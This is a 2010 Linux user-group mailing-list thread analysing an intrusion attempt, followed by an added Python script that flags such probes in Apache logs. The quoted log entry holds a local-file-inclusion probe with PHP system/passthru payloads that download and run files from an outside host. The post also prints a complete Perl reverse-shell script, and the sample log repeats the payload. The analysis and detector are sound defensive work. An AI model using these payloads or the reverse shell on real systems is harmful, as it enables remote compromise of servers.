On Tue, 22 Jun 2010 20:37:15 +0100 (BST) Gordon Henderson wrote:
>
> And who says Linux isn't targeted by scammers, etc...
>
>
> I noticed this in a log-file earlier - I see this sort of thing
> regularly, but thought I'd post one here for you:
>
> 94.199.181.165 - - [22/Jun/2010:19:13:20 +0100] "GET
> /index.php?_SERVER[ConfigFile]=../../../../../../../../../../../../../../../proc/self/environ%00
>
> HTTP/1.1" 404 270 "-" "<?system('cd /var/tmp;wget
> http://195.239.120.69/cb.txt;perl cb.txt 192.24.5.30 80;wget
> http://195.239.120.69/cback;chmod +x cback;./cback 192.24.5.30 80;cd
> /dev/shm;curl -O http://195.239.120.69/cb.txt;perl cb.txt 192.24.5.30
> 80;curl -O http://195.239.120.69/cback;chmod +x cback;./cback
> 192.24.5.30 80');?> ;<?exec_shell('cd /var/tmp;wget
> http://195.239.120.69/cb.txt;perl cb.txt 192.24.5.30 80;wget
> http://195.239.120.69/cback;chmod +x cback;./cback 192.24.5.30
> 80;cd /dev/shm;curl -O http://195.239.120.69/cb.txt;perl cb.txt
> 192.24.5.30 80;curl -O http://195.239.120.69/cback;chmod +x
> cback;./cback 192.24.5.30 80');?> ;<?passthru('cd /var/tmp;wget
> http://195.239.120.69/cb.txt;perl cb.txt 192.24.5.30 80;wget
> http://195.239.120.69/cback;chmod +x cback;./cback 192.24.5.30
> 80;cd /dev/shm;curl -O http://195.239.120.69/cb.txt;perl cb.txt
> 192.24.5.30 80;curl -O http://195.239.120.69/cback;chmod +x
> cback;./cback 192.24.5.30 80');?>;Ustupid MF is Back; Mozilla/4.0
> (compatible; MSIE 6.0; Windows 98)"
>
> That's an entry from an apache server log-file. Good, eh? I'm not
> sure what sort of index.php might respond to that request, however
> it's trying to run a program to wget a file, then perl the file.
>
> The perl file it gets, basically runs this:
>
> #!/usr/bin/perl
> use Socket;
> $cmd= "lynx";
> $system= 'echo "`uname -a`";echo "`id`";HISTFILE=/dev/null /bin/sh
> -i'; $0=$cmd;
> $target=$ARGV[0];
> $port=$ARGV[1];
> $iaddr=inet_aton($target) || die("Error: $!\n");
> $paddr=sockaddr_in($port, $iaddr) || die("Error: $!\n");
> $proto=getprotobyname('tcp');
> socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
> connect(SOCKET, $paddr) || die("Error: $!\n");
> open(STDIN, ">&SOCKET");
> open(STDOUT, ">&SOCKET");
> open(STDERR, ">&SOCKET");
> system($system);
> close(STDIN);
> close(STDOUT);
> close(STDERR);
>
> which appears to send some basic information to a remote site.
>
> then it fetches 'cback'. This is a binary file - and guess what it's
> compiled for:
>
> file cback
> cback: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV),
> for GNU/Linux 2.0.0, dynamically linked (uses shared libs), stripped
>
> Not going to execute it, but dumping strings from it reveals this:
>
> %s <host> <port>
> socket ok
> /bin/sh
> error: %s
> retring in 5 seconds
> fork error, retyr in 5 seconds
> cannot create socket, retring in 5 seconds
> GCC: (GNU) 3.3.3
>
>
>
> My guess is that it's sitting there, waiting for commands from a
> remote site - to do what? Who knows.
>
> So there you go - Linux *is* being targeted and obviously the target
> above is for some specific site running some specific version of some
> software, but who knows!

I just downloaded the Reverse Engineering Compiler (REC) and decompiled
the cback file to some C code. I have no idea what it says as I really
haven't a clue when it comes to C/C++.

I won't post the contents as this is a public and archived list. Anyone
wants the RECed C code to have a look through, let me know and I can
email you off-list.

Grant.

--
The Mailing List for the Devon & Cornwall LUG
http://mailman.dclug.org.uk/listinfo/list
FAQ: http://www.dcglug.org.uk/linux_adm/list-faq.html
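The log entry Gordon quotes has a recognisable shape: a query parameter that tries to override a PHP superglobal (`_SERVER[ConfigFile]=`), a long `../` chain ending in `/proc/self/environ`, a `%00` null byte to cut off whatever suffix the script appends, and PHP open tags with `system`/`exec_shell`/`passthru` calls stuffed into the User-Agent header, each running a wget/curl-then-execute chain. The script below is an added example written for this page, not code from the thread; it parses Apache combined-format lines and reports those indicators so an administrator can pull such probes out of a large access log. The log lines in `SAMPLE_LOG` are constructed for the example (the suspicious line is a shortened copy of the one in the post, with the same source and download addresses); the regexes and indicator names are my own choices, not any Apache or PHP convention.

```python
import re
from urllib.parse import unquote

# Apache "combined" log format: client, ident, user, [time], "request line",
# status, bytes, "referer", "user-agent".
COMBINED_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# PHP open tag followed by a command-execution function, as injected into
# the User-Agent in the post. exec_shell is not a real PHP function, but
# the probe tries it anyway, so it is matched too.
PHP_EXEC_RE = re.compile(
    r'<\?(?:php)?\s*(?:system|exec|passthru|shell_exec|exec_shell|popen|proc_open)\s*\(',
    re.IGNORECASE,
)
# A fetch (wget/curl) followed in the same command string by an interpreter,
# a chmod +x, or a ./binary launch: the download-and-run chain.
DROPPER_RE = re.compile(
    r'\b(?:wget|curl)\s+.*?;\s*(?:perl\b|chmod\s+\+x|\./)', re.IGNORECASE
)

# Constructed sample log: one probe modelled on the post's entry, two normal hits.
SAMPLE_LOG = r'''
192.0.2.10 - - [22/Jun/2010:19:10:01 +0100] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (X11; Linux x86_64)"
94.199.181.165 - - [22/Jun/2010:19:13:20 +0100] "GET /index.php?_SERVER[ConfigFile]=../../../../../../proc/self/environ%00 HTTP/1.1" 404 270 "-" "<?system('cd /var/tmp;wget http://195.239.120.69/cb.txt;perl cb.txt 192.24.5.30 80');?>; Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
192.0.2.11 - - [22/Jun/2010:19:15:42 +0100] "GET /images/logo.png HTTP/1.1" 200 8034 "http://example.org/" "Mozilla/5.0 (Windows NT 6.1)"
'''


def analyse_line(line):
    """Parse one combined-format line and list the indicators it carries.

    Returns None when the line does not parse, otherwise a dict with the
    client ip, HTTP status, request target and a (possibly empty) indicator list.
    """
    m = COMBINED_RE.match(line)
    if not m:
        return None
    f = m.groupdict()
    parts = f['request'].split(' ')
    target = parts[1] if len(parts) >= 2 else f['request']
    decoded = unquote(target)          # %2e%2e%2f and %00 become ../ and NUL
    indicators = []
    if decoded.count('../') >= 3:
        indicators.append('directory traversal')
    if '/proc/self/environ' in decoded:
        indicators.append('/proc/self/environ inclusion')
    if '\x00' in decoded:
        indicators.append('null byte in path')
    if '_SERVER[' in decoded:
        indicators.append('superglobal override via query string')
    # The code to be executed rides in headers that end up in the environment.
    for field in ('ua', 'referer'):
        if PHP_EXEC_RE.search(f[field]):
            indicators.append(f'php code in {field}')
        if DROPPER_RE.search(f[field]):
            indicators.append(f'download-and-run chain in {field}')
    return {'ip': f['ip'], 'status': int(f['status']),
            'target': target, 'indicators': indicators}


def scan(lines):
    """Return the parsed entries that carry at least one indicator."""
    flagged = []
    for line in lines:
        info = analyse_line(line.strip())
        if info and info['indicators']:
            flagged.append(info)
    return flagged


if __name__ == '__main__':
    for hit in scan(SAMPLE_LOG.strip().splitlines()):
        print(f"{hit['ip']} status={hit['status']}: {', '.join(hit['indicators'])}")
```

Run it against a real access log with `scan(open('/var/log/apache2/access.log'))`. The status is kept in the report on purpose: the 404 in Gordon's entry shows the probe found no script to include through, but the source address and the host serving `cb.txt` and `cback` are still worth blocking and watching for. The `_SERVER[...]=` trick only does anything where PHP's `register_globals` is on (off by default since PHP 4.2), and PHP 5.3.4 and later refuse paths containing a null byte, so those two settings are the first things to confirm on a server that logs requests like this.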